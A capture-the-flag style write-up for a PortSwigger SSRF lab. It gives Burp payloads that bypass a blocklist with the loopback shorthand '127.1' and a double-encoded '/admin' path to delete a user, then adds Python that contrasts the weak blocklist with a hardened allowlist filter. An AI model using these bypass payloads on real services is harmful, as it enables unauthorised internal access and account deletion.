Solution:

  • Turn on Burp Suite, open the lab, go to a product page and then to the stock check.
  • From the Burp history, send the stock-check request to Repeater.
  • Change the parameter to stockApi=http://localhost

(It is blocked, so we change it to 127.0.0.1, but that is also blocked, so we use 127.1 → it works.)

  • Now go to /admin (it is also blocked, so we have to double URL-encode it):
stockApi=http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65
  • In the response below, see:
href="/admin/delete?username=carlos
  • Now change it to:
stockApi=http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos

Lab Solved.
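The two bypasses above both work for the same reason: the filter compares strings, not meaning. "127.1" is a shorthand spelling of 127.0.0.1 that a blocklist looking for the literal text "127.0.0.1" never sees, and a path that is percent-encoded twice still hides the word "admin" after the filter has decoded it once. As an added example that is not part of this write-up or the PortSwigger lab, the Python below models a lab-style blocklist filter beside a hardened allowlist filter, so you can see each of the page's payloads pass the first and fail the second. The host name stock.example.internal, the path prefix /product/stock and both filter functions are constructed placeholders for the demo; the IPv4 canonicalisation relies on socket.inet_aton accepting shorthand forms, as it does on glibc.

```python
import ipaddress
import posixpath
import socket
from urllib.parse import urlsplit, unquote

# Constructed placeholders for the demo, not the lab's real configuration.
ALLOWED_HOSTS = {"stock.example.internal"}
ALLOWED_PATH_PREFIX = "/product/stock"


def blocklist_filter(url: str) -> bool:
    """Model of the string blocklist the lab defeats (constructed, not the
    lab's code). Returns True when the URL would be forwarded. It rejects the
    literal text 'localhost' / '127.0.0.1' and the word 'admin' after ONE
    percent-decode, which is why '127.1' and double encoding slip through."""
    if "localhost" in url or "127.0.0.1" in url:
        return False
    if "admin" in unquote(urlsplit(url).path):
        return False
    return True


def canonical_ipv4(host: str):
    """Return an IPv4Address for any spelling inet_aton accepts ('127.1',
    '0x7f.0.0.1', '2130706433'), or None when host is not an IPv4 literal."""
    try:
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except OSError:
        return None


def classify_host(host: str) -> str:
    """Label a host by where it actually points ('loopback', 'internal',
    'public') or 'name' for a DNS name, instead of matching one spelling."""
    ip = canonical_ipv4(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)  # catches IPv6 literals such as ::1
        except ValueError:
            return "name"
    if ip.is_loopback:
        return "loopback"
    if ip.is_private or ip.is_link_local or ip.is_reserved or ip.is_unspecified:
        return "internal"
    return "public"


def fully_decode(path: str, rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so nested encoding
    cannot hide the real path from the policy check."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            return path
        path = decoded
    return path


def allowlist_filter(url: str) -> bool:
    """Hardened check: plain http(s), no IP literal in any spelling, host on
    an exact allowlist, and the fully decoded, normalised path must stay under
    the single permitted prefix. Returns True when the URL may be forwarded."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname or ""
    if classify_host(host) != "name":
        return False  # the stock service is reached by name only
    if host not in ALLOWED_HOSTS:
        return False
    path = posixpath.normpath(fully_decode(parts.path))  # collapses /../
    return path == ALLOWED_PATH_PREFIX or path.startswith(ALLOWED_PATH_PREFIX + "/")


if __name__ == "__main__":
    # The page's own payloads, used as constructed test input.
    for candidate in (
        "http://stock.example.internal/product/stock/check?productId=1",
        "http://localhost/admin",
        "http://127.1/%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65/delete?username=carlos",
    ):
        print(candidate, "blocklist:", blocklist_filter(candidate),
              "allowlist:", allowlist_filter(candidate))
```

The design choice worth copying is that the hardened filter never asks "does this look like something bad"; it asks "is this exactly the one thing we allow" after canonicalising both the host (any numeric spelling becomes an address object) and the path (decoded until stable, then normalised). A blocklist that wants to keep working would at minimum have to apply the same canonicalisation before comparing, which is what classify_host and fully_decode show.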